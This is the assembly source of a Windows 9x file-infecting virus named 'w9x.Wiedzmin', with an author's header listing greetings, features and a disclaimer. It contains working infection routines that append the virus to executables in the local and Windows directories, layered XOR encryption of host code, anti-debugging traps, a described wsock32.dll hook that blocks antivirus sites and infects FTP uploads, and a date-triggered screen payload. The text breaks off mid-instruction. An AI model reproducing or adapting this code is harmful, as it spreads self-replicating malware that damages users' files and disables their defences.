; ; W D nnn ; WW Ww o D M O Nn nn ; Ww wW i eEeE dddDD ZzzZzZ Mm m m nN nn ; wW Ww ii e E d dD Zz m M M mm ii N n n ; Ww w wW ii Eeee d dD z mm m m i n N n ; W W W W ii e d dD z m mm ii n n n ; wWw wWwW iii eEee d dD zZzZzZ mm mm ii n nn ; ddddDd mm iii n n ; ; ă(c) YuP - Deithwen Addan - Artist of Rebelionă ; ă yup@tlen.pl ă ; ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Ä w9x.Wiedzmin Ä ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; ; ; ÄÄÄÄÄÄÄÄÄÄÄ ; ÄDISCLAIMERÄ ; ÄÄÄÄÄÄÄÄÄÄÄ ; This is a source of a virus, only source the compiled version ; cannot leave your computer! Author is NOT RESPONSIBLE FOR ANY ; ACTIONS WITH THIS CODE! ; ; ; ; ÄÄÄÄÄÄÄÄÄÄÄÄ ; Ä The name Ä ; ÄÄÄÄÄÄÄÄÄÄÄÄ ; ; The name 'Wiedzmin' was stolen from Andrzej Sapkowski saga "Wiedzmin". ; (sapkowski.pl,sapkowski.cz) - someone said that he is another ; Tolkien (in my opinion this book is even better then Tolkienz ; "Lord of the Rings"). ; Wiedzmin was a some kind of mutant (only few kids from 10 can survive ; wiedzmin test). As a mutant he was very fast, he was master of fencig, ; he can see at night, and he of course can make magic signs. ; Blah ... ; Next he went, and travel around the world (he was killing monsterz for money). ; In his journey he met new fantasic characters like Regis (vapire), ; Milva (hunter), Jaskier (bard), Yennefer (witch) , Ciri (child of destinty) ; ... ; ; The book is realy FANTASTIC! Full of adventures, fight, sex (X-D), ; blood, swearwords, and much much more! I realy advice you to READ IT! ; (check translationz for your language: www.sapkowski.pl). ; If you like fantasy you CAN'T miss IT! ; ; ; ÄÄÄÄÄÄÄÄÄÄÄÄ ; Ä Music Ä ; ÄÄÄÄÄÄÄÄÄÄÄÄ ; ; I'd like to thx some kewl music groups in range of rock-hiphop: ; Outsidez: Polish groupz: ; ćDeep Purple ćMolesta ; ćIron Maiden ćFenomen ; ćLinkin Park ćZipera ; ćRage Against the Machine ćGrammatik ; ćKoRn ćEldo ; ćLimp Bizkit ćKaliber 44 ; ; I'm a weird person ;] ; ; ; ÄÄÄÄÄÄÄÄÄÄÄÄ ; Ä Greetz Ä ; ÄÄÄÄÄÄÄÄÄÄÄÄ ; ; Greetz go to: ; ćFriendz from city: ; Yoo (:]) ; Misiek (dzienx za plyty stary) ; Klosina (nie rzucaj nozami) ; Straż Miejska (nie trzymamy nog na lawkach :p) ; I dla reszty ludkuf, nie wymienialem was bo i tak ; nigdy tego nie przeczytacie. ; ; ćGuyz from Undernet: ; Toro (busy today?) ; SlageHammer (helo tester ;D) ; Spanska (BloodHound.W32.WSWORM ;[) ; żBFF70000h (lagz lagz lagz) ; ; ćGuyz from irc.pl: ; Blaze (stuk puk) ; Detergent (walek) ; Shmastah (judeIRC ;]) ; Ajron (ten nie prawdziwy :P) ; Aamf-girl (gimnazjalistka ;P) ; Wizja (dolly ma reumatyzm czy jakos tak ;>) ; Pafko (dragonball rulez!) ; Crash (why you? ;P) ; ; ; ÄÄÄÄÄÄÄÄÄÄÄÄ ; Ä Briefing Ä ; ÄÄÄÄÄÄÄÄÄÄÄÄ ; ; Virus name : w9x.Wiedzmin ; Virus version : 1.0 ; Virus author : Lord YuP - Deithwen Addan ; Release date : 6.02.02+8.02.02 i forgot to install SEH, he he ; Virus type : PE infector and WSOCK32.DLL hooker ; Target Systems : win95<nt>, win98<nt>, winME<t> ; [nt] - not tested (should work, if not fuck it!) ; [t] - tested ; ; ; Encryption : 3 LAYERS CRYPTED BY RANDOM NUMBER! ; 1 - cryptz main virus body ; 2 - cryptz host body ; 3 - cryptz virus data ; ; Every layer is crypted by another key. ; ; Virus helper : Virus when found section called different ; then ".text" or "CODE" (EIP must point to ; it) it is gonna to crypt all file body ; and put only decryptor into last section. ; The main body (with other virus probably) ; is crypted by random key. EIP points to ; decryptor. ; ; ; ; Polymorphic : Yep random key crypting, adding ; 90h<NOP> garbage in the range ; of 0-255. ; ; ; AntiAV : Virus wouldn't infect filez ; with 'a','A','E','e','v','V' ; at start. ; ; ; AntiDEBUG : Yep, using win9x Softice detection, ; and IsDebuggerPresent API. When ; sice is found it shows message in ; debbuger and exec int 19h ! ; Other debbugers like td32, SoftSnoop ; end so on = int 19h! ; ; ; WSOCK32 hooker : Virus infect wsock32.dll replacing the ; send, connect function addressez. ; After reboot (wininit.ini ;P) functionz ; will be hooked. User will never connect ; to AV sitez (error: host not found), ; and when user will try to put a file in ; the FTP account, virus will infect it on ; fly. ; ; ; ; Infection procez : Virus infect 7 filez in the local ; directory and 7 filez in the windowz ; directory. Virus is going to apend ; itself to the last section. The section ; is increased. EIP points to it. ; ; ; ; Payload : On 22.06 or 22.12 every run it gonna ; print color string in the infinite ; loop. The string will be VISIBLE ; everywhere - virus grabz active ; window HDC! ; ; ; ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[WIEDZMIN.ASM]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ .386 .model flat jumps locals extrn ExitProcess:PROC extrn MessageBoxA:PROC FILETIME STRUC dwLowDateTime dd ? dwHighDateTime dd ? FILETIME ends WIN32_FIND_DATA struc ;FIND DATA dwFileAttributes dd 0 dwLowDateTime0 dd ? dwHigDateTime0 dd ? dwLowDateTime1 dd ? dwHigDateTime1 dd ? dwLowDateTime2 dd ? dwHigDateTime2 dd ? nFileSizeHigh dd ? nFileSizeLow dd ? dwReserved dd 0,0 cFileName db 260 dup(0) cAlternateFilename db 14 dup(0) db 2 dup(0) WIN32_FIND_DATA ends hooksize equ hook_end-start_h sendh equ (offset hooked_send-offset start_h) connecth equ (offset hooked_connect-offset start_h) vvsize equ HeapEnd-HeapStart virussize equ VirusEnd-v_start allsize equ virussize TO_DE equ @loop_decryptt-@to_this helper equ @helper_end-@uncrypt virussizee macro db virussize/10000 mod 10 + "0" db virussize/01000 mod 10 + "0" db virussize/00100 mod 10 + "0" db virussize/00010 mod 10 + "0" db virussize/00001 mod 10 + "0" endm .DATA db ? .CODE v_start: pushad pushfd call @delta @delta: pop ebp ;ebp contains address of @delta right now in sub ebp,offset @delta ;memory -> we must sub the linking @delta val cmp ebp,0 je @_KERNEL @main_decryptor: lea edx,[ebp+offset @to_this] mov eax,[ebp+key_main] mov ecx,TO_DE @loop_decrypt: xor byte ptr [edx],al inc edx loop @loop_decrypt cmp edi,'!PUY' jne @to_this ret @to_this: lea edi,[ebp+offset APIList] lea esi,[ebp+offset APIList] call @UN_CRYPT_BYTEZ lea edi,[ebp+offset TO_CRYPT_DATA] lea esi,[ebp+offset TO_CRYPT_DATA] call @UN_CRYPT_BYTEZ @_KERNEL: lea eax, [ebp+fault] ; Setup a SEH frame push eax push dword ptr fs:[0] mov fs:[0], esp mov eax,0BFF70000h ;kerneloz w95 cmp word ptr [eax],'ZM' je _GOT_KERNEL ;NT moze pozniej :p mov eax,0BFF60000h ;ladujemy kernela ;) winME ;) cmp word ptr [eax],'ZM' ;check is it a exe file je _GOT_KERNEL jmp @EXIT _GOT_KERNEL: mov dword ptr [ebp+capis],5h mov dword ptr [ebp+Kernel],eax @go_export: mov dword ptr [ebp+NON],000000h mov dword ptr [ebp + AOF],000000h mov dword ptr [ebp + AON],000000h mov dword ptr [ebp + AOO],000000h mov edx,eax mov ebx,edx mov edi, [eax + 03ch] ;a valid PE ? add edx, edi cmp dword ptr [edx],'EP' jne @EXIT mov edx,[edx + 078h] ;export table add edx,eax ;mamy w edx -> export table mov esi,[edx + 018h] mov dword ptr [ebp + NON],esi mov esi,[edx+1Ch] mov dword ptr [ebp + AOF],esi add dword ptr [ebp + AOF],eax mov esi,[edx+20h] mov dword ptr [ebp + AON],esi add dword ptr [ebp + AON],eax mov esi,[edx+24h] mov dword ptr [ebp + AOO],esi add dword ptr [ebp + AOO],eax @export_read: mov esi,dword ptr [ebp + AON] mov [ebp+offset IndexA],esi ;save into naming index mov esi,dword ptr [esi] add esi,eax xor ebx,ebx @__GPA: cmp dword ptr [ebp+capis],5h je @zwykle lea edi,[ebp+offset A1] mov ecx,A1s cmp dword ptr [ebp+capis],1 jne @porownaj lea edi,[ebp+offset A2] mov ecx,A2s jmp @porownaj @zwykle: lea edi,[ebp + offset APIS] ;mam offset zmiennej @GET_GPA: mov ecx,APIS_SIZE ;size api @porownaj: rep cmpsb ;scan je found ;if equal calculate function address Scan_dalej: add dword ptr [ebp + offset IndexA],4 mov esi,[ebp + offset IndexA] mov esi,[esi] add esi,eax cmp dword ptr [ebp+offset NON],ebx je @EXIT inc ebx cmp dword ptr [ebp+offset NON],ebx je @EXIT jmp @__GPA found: mov eax,ebx ;mamy GPA !!! mov ecx,edi inc ecx push ecx ;na stos ;P mov eax,ebx ;EAX=>counter mov ecx,2 mul ecx ;mnozymy EAX*2 pop ecx ;zdejmujemy ze stosu ECX mov esi,[ebp + AOO] add esi,eax xor eax,eax mov ax,word ptr [esi] mov ecx,4 mul ecx cmp dword ptr [ebp+go_wsock],1 jne @skip_it_urgh mov esi,[ebp + AOF] add esi,eax mov eax,[esi] cmp dword ptr [ebp+capis],1 je @make_1 ;mov ebx,dword ptr [ebp+wsock_hh] ;mov dword ptr [ebp+a_send],eax ;add dword ptr [ebp+a_send],ebx ;mov eax,dword ptr [ebp+a_send] mov ebx,sendh mov edx,dword ptr [ebp+moj_address] ;tricky shit ;] add edx,ebx jmp make_real @make_1: mov ebx,connecth mov edx,dword ptr [ebp+moj_address] ;tricky shit ;] add edx,ebx make_real: mov [esi],edx inc dword ptr [ebp+capis] cmp dword ptr [ebp+capis],2 je @go_out_now mov eax,dword ptr [ebp+wsock_h] jmp @go_export @go_out_now: ret @skip_it_urgh: mov esi,[ebp + AOF] add esi,eax mov edi,dword ptr [esi] add edi,[ebp+offset Kernel] mov eax,edi mov dword ptr [ebp+_GPA],eax @GET_APIS: ;API Search xor esi,esi lea esi,[ebp+offset APIList] lea edi,[ebp+offset _FindFirstFileA] ;mamy d wordy czyli skok co 4 bajty ;stosd -> z EAX do EDI @go_table: push esi push dword ptr [ebp+offset Kernel] call dword ptr [ebp+offset _GPA] stosd @next_byte: inc esi cmp byte ptr [esi],00h jne @next_byte inc esi cmp byte ptr [esi],07h jne @go_table mov eax,dword ptr [ebp+_GetCurrentDirectoryA] mov dword ptr [ebp+gcd],eax mov eax,dword ptr [ebp+_WinExec] mov dword ptr [ebp+wex],eax lea eax,[ebp+offset wsock] inc eax push eax call dword ptr [ebp+_LoadLibraryA] mov dword ptr [ebp+wsock_hh],eax lea ecx,[ebp+offset sle] push ecx push eax call dword ptr [ebp+offset _GPA] mov dword ptr [ebp+_WSASetLastError],eax lea ecx,[ebp+offset A1] push ecx push dword ptr [ebp+wsock_hh] call dword ptr [ebp+offset _GPA] mov dword ptr [ebp+a_send],eax lea ecx,[ebp+offset A2] push ecx push dword ptr [ebp+wsock_hh] call dword ptr [ebp+offset _GPA] mov dword ptr [ebp+a_connect],eax push 4h ; PAGE_READWRITE push 1000h ; MEM_COMMIT push 1000 ; size of buffer push 0 ; lpAddress call dword ptr [ebp+_VirtualAlloc] ; Alloc IT! mov dword ptr [ebp+vbuf],eax ;********************************DEBUG TRAP****************************************************** ;call @debug_trap ;************************************************************************************************ call @wsockz mov dword ptr [ebp+go_wsock],0 lea eax,[ebp+SYSTEM_TIME] push eax call dword ptr [ebp+_GetSystemTime] cmp word ptr [ebp+wMonth],6 ;22.06 Midaëte jne try_ cmp word ptr [ebp+wDay],22 jne try_ call make_it_real try_: cmp word ptr [ebp+wMonth],12 ;22.12 Midinvaerne jne cya_folx cmp word ptr [ebp+wDay],22 jne cya_folx call make_it_real cya_folx: call @GGEN_KEY lea edi,[ebp+offset APIList] lea esi,[ebp+offset APIList] call @CRYPT_BYTEZ lea edi,[ebp+offset TO_CRYPT_DATA] lea esi,[ebp+offset TO_CRYPT_DATA] call @CRYPT_BYTEZ _done: lea edi,[ebp+finddata.cFileName] call dword ptr [ebp+_GetCommandLineA] mov esi,eax xor ebx,ebx _skip_space: lodsb cmp al,0 je @GetWDir cmp al,' ' je _ave_it jmp _skip_space _ave_it: lodsb inc ebx cmp al,0 je @infect_shit stosb jmp _ave_it @infect_shit: cmp ebx,4 jl @GetWDir lea esi,[ebp+offset finddata.cFileName] add esi,ebx sub esi,5 lodsb cmp al,'.' je yep_it jmp @GetWDir yep_it: push dword ptr [ebp+key_main] push dword ptr [ebp+key_next] push dword ptr [ebp+e_bytes] push dword ptr [ebp+e_where] push dword ptr [ebp+hosteip] push dword ptr [ebp+imagebase] call @infect pop dword ptr [ebp+imagebase] pop dword ptr [ebp+hosteip] pop dword ptr [ebp+e_where] pop dword ptr [ebp+e_bytes] pop dword ptr [ebp+key_next] pop dword ptr [ebp+key_main] push 0h call dword ptr [ebp+_ExitProcess] @GetWDir: lea eax,[ebp+offset winDIR] push 260 push eax call dword ptr [ebp+_GetWindowsDirectoryA] ;now local dir lea eax,[ebp+offset oldDIR] push eax push 560 call dword ptr [ebp+_GetCurrentDirectoryA] mov dword ptr [ebp+was_win],0000000h @Find1st: mov dword ptr [ebp+ic],0000000h lea eax,[ebp+offset finddata] push eax lea eax,[ebp+offset marker] push eax call dword ptr [ebp+_FindFirstFileA] mov dword ptr [ebp+sHnd],eax inc eax jz @d_dalej @workk: push dword ptr [ebp+key_main] push dword ptr [ebp+key_next] push dword ptr [ebp+e_bytes] push dword ptr [ebp+e_where] push dword ptr [ebp+hosteip] push dword ptr [ebp+imagebase] call @infect pop dword ptr [ebp+imagebase] pop dword ptr [ebp+hosteip] pop dword ptr [ebp+e_where] pop dword ptr [ebp+e_bytes] pop dword ptr [ebp+key_next] pop dword ptr [ebp+key_main] @@Fnext: lea eax,[ebp+offset finddata] push eax push dword ptr [ebp+offset sHnd] call dword ptr [ebp+_FindNextFileA] cmp eax,0 je @d_dalej push dword ptr [ebp+key_main] push dword ptr [ebp+key_next] push dword ptr [ebp+e_bytes] push dword ptr [ebp+e_where] push dword ptr [ebp+hosteip] push dword ptr [ebp+imagebase] call @infect pop dword ptr [ebp+imagebase] pop dword ptr [ebp+hosteip] pop dword ptr [ebp+e_where] pop dword ptr [ebp+e_bytes] pop dword ptr [ebp+key_next] pop dword ptr [ebp+key_main] cmp dword ptr [ebp+ic],7 jne @@Fnext @d_dalej: cmp dword ptr [ebp+was_win],0 jne @dalej _WinINF: cmp dword ptr [ebp+was_win],0 jne _stepnext lea eax,[ebp+offset winDIR] push eax call dword ptr [ebp+_SetCurrentDirectoryA] mov dword ptr [ebp+ic],0000000h mov dword ptr [ebp+was_win],1 push dword ptr [ebp+sHnd] call dword ptr [ebp+_FindClose] _stepnext: cmp dword ptr [ebp+ic],7 jne @Find1st @dalej: lea eax,[ebp+offset oldDIR] push eax call dword ptr [ebp+_SetCurrentDirectoryA] jmp @EXIT fault: mov esp, [esp+8] @EXIT: push 4000h push 1000 push dword ptr [ebp+vbuf] call dword ptr [ebp+_VirtualFree] pop dword ptr fs:[0] add esp, 4 cmp ebp,0 ;first GeneratioN? jne _ETH ;tak to wyjc ;] call fakehost _ETH: call @uncrypt popfd popad call @gd @gd: pop ebp sub ebp,offset @gd mov eax,dword ptr [ebp+hosteip] add eax,dword ptr [ebp+imagebase] jmp eax Kernel dd 0 ;<##############################################################################################> ;------------------------------------------------------------------------------------------------ ;************************************************************************************************ ;INFECT EM GLOWZ !!!! ;************************************************************************************************ ;------------------------------------------------------------------------------------------------ ;<##############################################################################################> @infect: call @bad_name cmp edi,1 jne _continue ret @infect0: _continue: lea esi,[ebp+offset finddata.cFileName] push esi call dword ptr [ebp+_GetFileAttributesA] mov dword ptr [ebp+fileAtrib],eax inc eax jz _Out lea eax,[ebp+F1] push eax lea eax,[ebp+F2] push eax lea eax,[ebp+F3] push eax push dword ptr [ebp+fHnd] call dword ptr [ebp+_GetFileTime] push 00000080h push esi call dword ptr [_SetFileAttributesA+ebp] ; clean file cmp eax,0 je _Out ;mov ecx,dword ptr [ebp+finddata.nFileSizeLow] ;mov [ebp+offset memory],ecx ;Ble otfieramy zeby miec handle xor eax,eax lea esi,[ebp+offset finddata.cFileName] push eax push 00000080h push 00000003h push eax push eax push 80000000h OR 40000000h push esi call dword ptr [ebp+_CreateFileA] mov edi,eax ;w edi handle inc eax jz _Out dec eax mov dword ptr [ebp+offset fileHandle],eax _Oblicz: push 0 push dword ptr [ebp+offset fileHandle] call dword ptr [ebp+_GetFileSize] mov dword ptr [ebp+fSize],eax inc eax jz _Out2 dec eax mov dword ptr [ebp+finddata.nFileSizeLow],eax mov ecx,dword ptr [ebp+fSize] call MapF mov ecx,dword ptr [ebp+fSize] call VMapF ;w esi mamy maping tak jak z kernelem _Check_PE: cmp word ptr [esi],'ZM' jne _Out3 mov ecx,[esi+3ch] cmp dword ptr [esi+ecx],'EP' jne _Out3 add esi,ecx ;ESI => PE HEADER mov edi,esi _Saving: mov dword ptr [ebp+header],esi mov ecx,[esi+28h] mov dword ptr [ebp+hosteip],ecx mov ecx,[esi+3ch] mov dword ptr [ebp+align],ecx mov ecx,[esi+34h] mov dword ptr [ebp+imagebase],ecx mov ecx,[esi+38h] ;get section align value mov [ebp + _secAlign],ecx ;and save it _Infecto0: cmp dword ptr [esi+4ch],"deiW" jz _No_infect push dword ptr [esi+3Ch] ;*********************************************************************************************** mov eax,[ebp+offset fMapReal] push eax mov eax, [ebp+_UnmapViewOfFile] call eax push dword ptr [ebp+fHndMap] call dword ptr [ebp+_CloseHandle] ;mov eax,dword ptr [ebp+go_wsock] mov eax,dword ptr [ebp+fSize] ; And Map all again. cmp dword ptr [ebp+go_wsock],1 je @dodaj add eax,virussize+vvsize ;add eax,vvsize jmp @nextt @dodaj:add eax,hooksize @nextt: pop ecx call Align_ mov dword ptr [ebp+memory],eax mov ecx,eax call MapF mov ecx,dword ptr [ebp+memory] call VMapF cmp dword ptr [ebp+go_wsock],1 je @0dal call @crypt_host cmp dword ptr [ebp+help_virus],1 je _God @0dal: mov esi,[eax+3ch] add esi,eax ;ESI => PE HEADER mov edi,esi ;************************************************************************************************ inc dword ptr [ebp+ic] xor eax,eax mov ax,[esi + 06h] ;load number of sections mov ecx,28h ;28 bytes for each section header dec eax ;seeking for last,... mul ecx ;and mul it add esi,eax ; Normalize add esi,78h ; Ptr to dir table mov edx,[edi+74h] ; EDX = n§ of dir entries shl edx,3 ; EDX = EDX*8 add esi,edx ; ESI = Ptr to last section mov edx,[esi+10h] ; EDX = SizeOfRawData mov ebx,edx ; EBX = EDX add edx,[esi+14h] ; EDX = EDX+PointerToRawData push edx ; Preserve EDX mov eax,ebx ; EAX = EBX add eax,[esi+0Ch] ; EAX = EAX+VA Address ; EAX = New EIP ;mov [edi+28h],eax ; Change the new EIP mov dword ptr [ebp+NewEIP],eax ; Also store it cmp dword ptr [ebp+go_wsock],1 je @infect_then mov eax,dword ptr [ebp+NewEIP] mov [edi+28h],eax @infect_then: mov eax,[esi+10h] ; EAX = new SizeOfRawData cmp dword ptr [ebp+go_wsock],1 je @dallejj add eax,vvsize+virussize ; EAX = EAX+VirusSize jmp @nexttt @dallejj: add eax,hooksize @nexttt: mov ecx,[edi+3Ch] ; ECX = FileAlignment call Align_ ; Align! mov [esi+10h],eax ; New SizeOfRawData mov [esi+08h],eax ; New VirtualSize pop edx ; EDX = Raw pointer to the ; end of section cmp dword ptr [ebp+go_wsock],1 je @skip_thiss mov eax,[esi+10h] ; EAX = New SizeOfRawData add eax,[esi+0Ch] ; EAX = EAX+VirtualAddress mov [edi+50h],eax ; EAX = New SizeOfImage @skip_thiss: or dword ptr [esi+24h],0A0000020h mov dword ptr [edi+4ch],"deiW" ;Wiedzmin here ;) lea esi,[ebp+v_start] ; ESI = Ptr to virus_start xchg edi,edx ; EDI = Raw ptr after last mov dword ptr [ebp+moj_address],edi ; section add edi,dword ptr [ebp+fMapReal] ;EDI = Normalized ptr mov ecx,virussize ;ECX = Size to copy cmp dword ptr [ebp+go_wsock],1 jne @write_it mov ecx,hooksize lea esi,[ebp+start_h] @write_it: cmp dword ptr [ebp+go_wsock],1 je step_0 call @crypt_my_body jmp step_1 step_0: rep movsb ;Do it! step_1: cmp dword ptr [ebp+go_wsock],1 jne _Git ret _Git: jmp _God _No_infect: cmp dword ptr [ebp+go_wsock],1 jne @zw mov edx,-1 jmp _God @zw: mov ecx,dword ptr [ebp+finddata.nFileSizeLow] call @zostaf dec dword ptr [ebp+ic] _God: mov eax,[ebp+offset fMapReal] push eax mov eax, [ebp+_UnmapViewOfFile] call eax _Out3: push dword ptr [ebp+fHndMap] call dword ptr [ebp+_CloseHandle] _Out2: lea eax,[ebp+F1] push eax lea eax,[ebp+F2] push eax lea eax,[ebp+F3] push eax push dword ptr [ebp+fHnd] call dword ptr [ebp+_SetFileTime] push dword ptr [ebp+offset fileHandle] call dword ptr [ebp+_CloseHandle] cmp dword ptr [ebp+go_wsock],1 je @@@z push 1 lea eax,[ebp+santa] push eax lea eax,[ebp+finddata.cFileName] push eax call dword ptr [ebp+_CopyFileA] @@@z: ;&resetore the attributez push dword ptr [ebp+fileAtrib] lea eax,[ebp+finddata.cFileName] push eax call dword ptr [ebp+_SetFileAttributesA] mov edx,-1 _Out: ret Align_: push edx xor edx,edx push eax div ecx pop eax sub ecx,edx add eax,ecx pop edx ret @zostaf: xor eax,eax push eax push eax push ecx push dword ptr [ebp+fileHandle] call dword ptr [ebp+offset _SetFilePointer] push dword ptr [ebp+fileHandle] call dword ptr [ebp+offset _SetEndOfFile] ret ;************************** ;ECX - size to map ;************************** MapF: xor eax,eax push eax push ecx push eax push 00000004h push eax push dword ptr [ebp+fileHandle] call dword ptr [ebp+_CreateFileMappingA] cmp eax,0 je _Out2 mov dword ptr [ebp+fHndMap],eax ret VMapF: xor eax,eax push ecx push eax push eax push 00000004h OR 00000002h push dword ptr [ebp+fHndMap] call dword ptr [ebp+_MapViewOfFile] cmp eax,0 je _Out3 mov dword ptr [ebp+fMapReal],eax mov esi,eax ret @TRY_RELOC: ret @debug_trap: ;ret call dword ptr [ebp+_IsDebuggerPresent] or eax,eax jz _leave_me ble: mov eax, 909119cdh ;int 19h! jmp $ - 4 _leave_me: lea eax,[ebp+sice9x] push 00000000h push 00000080h push 00000003h push 00000000h push 00000001h push 0C0000000h push eax call dword ptr [ebp+_CreateFileA] inc eax jz leave_it dec eax push eax call dword ptr [ebp+_CloseHandle] lea eax,[ebp+to_ja] push eax call dword ptr [ebp+_OutputDebugStringA] mov eax, 909119cdh ;int 19h! jmp $ - 4 jmp @EXIT leave_it: ret ;************************************************************************************************ ;PayL0ad ;] ;this is very simple coz i don't have any time to make it perfect ;************************************************************************************************ payload: p_x dd 0 p_y dd 0 hdc dd 0 wh dd 0 screen_x dd 0 screen_y dd 0 font dd 0 color: dd 15466513 dd 15474944 dd 15484928 dd 15496448 make_it_real: pay: lea esi,[ebp+@GDI_APIZ] lea edi,[ebp+@GDI_APIZA] lea ebx,[ebp+gdi32] change_l: push ebx call dword ptr [ebp+_LoadLibraryA] mov ebx,eax @find_a: push esi push ebx call dword ptr [ebp+_GPA] stosd check_a: inc esi cmp byte ptr [esi],0 jne check_a inc esi cmp byte ptr [esi],77h je change_ll cmp byte ptr [esi],69h je @go_pay jmp @find_a change_ll: inc esi lea ebx,[ebp+user32] jmp change_l @go_pay: push 1 call dword ptr [ebp+_GetSystemMetrics] ;user mov dword ptr [ebp+screen_y],eax push 0 call dword ptr [ebp+_GetSystemMetrics] ;user mov dword ptr [ebp+screen_x],eax call c_font lea esi,logo xor ebx,ebx l: call dword ptr [ebp+_GetDesktopWindow] ;user mov dword ptr [ebp+wh],eax push dword ptr [ebp+wh] call dword ptr [ebp+_GetWindowDC] ;user mov dword ptr [ebp+hdc],eax call draww push dword ptr [ebp+hdc] push dword ptr [ebp+wh] call dword ptr [ebp+_ReleaseDC] ;user jmp l draww: xor eax,eax lodsb lea edi,[ebp+jed] stosb cmp al,0 jne @wypisz lea esi,[ebp+logo] lodsb lea edi,[ebp+jed] stosb @wypisz: cmp al,'i' jne @dik add dword ptr [ebp+p_x],6 @dik: push dword ptr [ebp+font] push dword ptr [ebp+hdc] call dword ptr [ebp+_SelectObject] ;gdi push 0 push dword ptr [ebp+hdc] call dword ptr [ebp+_SetBkMode] ;gdi mov eax,dword ptr [ebp+color+ebx] add ebx,4 cmp ebx,4*4 jl @n1 xor ebx,ebx @n1: push eax push dword ptr [ebp+hdc] call dword ptr [ebp+_SetTextColor] ;gdi push 1 lea eax,[ebp+jed] push eax push dword ptr [ebp+p_y] push dword ptr [ebp+p_x] push dword ptr [ebp+hdc] call dword ptr [ebp+_TextOutA] ;gdi mov eax,dword ptr [ebp+screen_y] cmp dword ptr [ebp+p_y],eax jae chang_g mov eax,dword ptr [ebp+screen_x] add dword ptr [ebp+p_x],13 cmp dword ptr [ebp+p_x],eax jle spp mov dword ptr [ebp+p_x],0 add dword ptr [ebp+p_y],15 jmp spp chang_g: mov dword ptr [ebp+p_y],0 spp: push 50 call dword ptr [ebp+_Sleep] ret c_font: push offset famil xor eax,eax push eax push eax push eax push eax push eax push eax push eax push eax push eax push eax push eax push 9 push 9 call dword ptr [ebp+_CreateFontA] ;gdi mov [font],eax ret @GDI_APIZ: db "CreateFontA",0 db "TextOutA",0 db "SetBkMode",0 db "SetTextColor",0 db "SelectObject",0 db 77h db "GetSystemMetrics",0 ;user32 part X-D db "GetDesktopWindow",0 db "GetWindowDC",0 db "ReleaseDC",0 db 69h ;************************************************************************************************ ;Handle this sucker ;] ;************************************************************************************************ @crypt_host: ;push dword ptr [ebp+key_next] pushad mov eax,dword ptr [ebp+fMapReal] mov esi,[eax+3ch] add esi,eax ;ESI => PE HEADER mov edi,esi xor eax,eax mov ax,[esi + 06h] ;load number of sections mov ecx,0h ;28 bytes for each section header add esi,ecx ; Normalize add esi,78h ; Ptr to dir table mov edx,[edi+74h] ; EDX = n§ of dir entries shl edx,3 ; EDX = EDX*8 add esi,edx ; ESI = Ptr to last section mov ecx,[edi+28h] search_it: mov ebx,dword ptr [esi+0ch] add ebx,dword ptr [esi+08h] inc eax cmp ecx,ebx jb sfound dec eax jz @e_error add esi,28h jmp search_it sfound: test dword ptr [esi+24h],10000000h ;check section atributes jnz @e_error or dword ptr [esi+24h],0A0000020h cmp dword ptr [esi],'xet.' je _01 cmp dword ptr [esi],'EDOC' je _01 mov dword ptr [ebp+help_virus],1 _01: push eax ;STEP GET RAW ADDRESS mov edx,ecx sub edx,dword ptr [esi+0ch] ;IMAGEBASE - VIRTUAL RVA=0 add edx,[esi+014h] ;ADD RAW OFFSET mov dword ptr [ebp+e_where],edx push edx mov edx,[esi+010h] mov dword ptr [ebp+e_bytes],edx pop edx add edx,dword ptr [ebp+fMapReal] ;WHERE TO CRYPT! mov ecx,[esi+10h] mov dword ptr [ebp+e_god],0 mov dword ptr [ebp+firstk],1h pushad lea edi,[ebp+key_next] call @GGEN_KEY call @combine_key mov eax,dword ptr [ebp+key_next] popad mov dword ptr [ebp+firstk],0 push esi mov eax,dword ptr [ebp+key_next] xor ebx,ebx @loop_it: ;=> IF 5 BYTES ARE ZEROZ THEN THE DON't CRYPT BELOW cmp byte ptr [edx],00h jne @go_ cmp byte ptr [edx+1],00h jne @go_ cmp byte ptr [edx+2],00h jne @go_ cmp byte ptr [edx+3],00h jne @go_ cmp byte ptr [edx+4],00h je @crypted @go_: xor byte ptr [edx],al inc edx loop @loop_it jmp @e_out @crypted: pop esi mov eax,dword ptr [ebp+e_bytes] sub eax,ecx mov dword ptr [ebp+e_bytes],eax jmp @e_out @e_error: @e_out: pop eax cmp dword ptr [ebp+help_virus],1 je @mute_other_virus popad ret ;ENTRY: EDI - BUFFER @combine_key: mov eax,dword ptr [ebp+key2] stosd add eax,dword ptr [ebp+key] lea edi,[ebp+key_main] stosd ret ;************************************************************************** ;UNCRYPT *|* ;************************************************************************** @uncrypt: call delta_e delta_e: pop ebp sub ebp,offset delta_e pushad mov edx,dword ptr [ebp+imagebase] add edx,dword ptr [ebp+hosteip] mov ecx,dword ptr [ebp+e_bytes] xor ebx,ebx mov eax,[ebp+key_next] @lloop_it: xor byte ptr [edx],al inc edx loop @lloop_it f_e: cmp dword ptr [ebp+czy_je],0 jne @helper_endd popad ret @helper_endd: popad mov eax,dword ptr [ebp+hosteip] add eax,dword ptr [ebp+imagebase] jmp eax czy_je dd 0 e_bytes dd 0 e_where dd 0 e_god dd 0 hosteip dd 0 imagebase dd 0 key_next dd 0 @helper_end: nop ;*********************************************************** @mute_other_virus: mov eax,dword ptr [ebp+fMapReal] mov esi,[eax+3ch] add esi,eax ;ESI => PE HEADER mov edi,esi xor eax,eax mov ax,[esi + 06h] ;load number of sections mov ecx,28h ;28 bytes for each section header dec eax ;seeking for last,... mul ecx ;and mul it add esi,eax ; Normalize add esi,78h ; Ptr to dir table mov edx,[edi+74h] ; EDX = n§ of dir entries shl edx,3 ; EDX = EDX*8 add esi,edx ; ESI = Ptr to last section mov edx,[esi+10h] ; EDX = SizeOfRawData mov ebx,edx ; EBX = EDX add edx,[esi+14h] ; EDX = EDX+PointerToRawData push edx ; Preserve EDX mov eax,ebx ; EAX = EBX add eax,[esi+0Ch] ; EAX = EAX+VA Address ; EAX = New EIP mov [edi+28h],eax ; Change the new EIP mov dword ptr [ebp+NewEIP],eax ; Also store it mov eax,dword ptr [ebp+fSize] add eax,helper mov 